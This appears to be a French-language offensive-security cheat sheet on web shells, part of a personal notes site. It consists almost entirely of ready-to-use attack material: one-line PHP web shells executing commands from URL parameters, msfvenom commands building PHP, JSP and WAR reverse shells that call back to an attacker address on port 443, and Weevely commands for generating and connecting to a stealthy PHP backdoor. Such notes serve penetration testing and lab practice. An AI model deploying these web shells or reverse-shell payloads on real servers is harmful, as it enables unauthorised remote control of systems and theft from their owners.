Whackermelon
notes / shells / web-shells

Web Shells

sommaire

PHP

<?php system($_GET['cmd']); ?>            ->  http://site/sh.php?cmd=id
<?php echo shell_exec($_REQUEST['c']); ?>
echo '<?php system($_GET["cmd"]); ?>' > sh.php

msfvenom (selon la techno)

msfvenom -p php/reverse_php LHOST=10.10.14.5 LPORT=443 -f raw -o sh.php
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f raw -o sh.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f war -o sh.war   # Tomcat

Weevely (PHP furtif) & emplacements

weevely generate motdepasse sh.php
weevely http://site/uploads/sh.php motdepasse
# webshells prets : /usr/share/webshells/  (kali). Retrouver le chemin d'upload avec gobuster.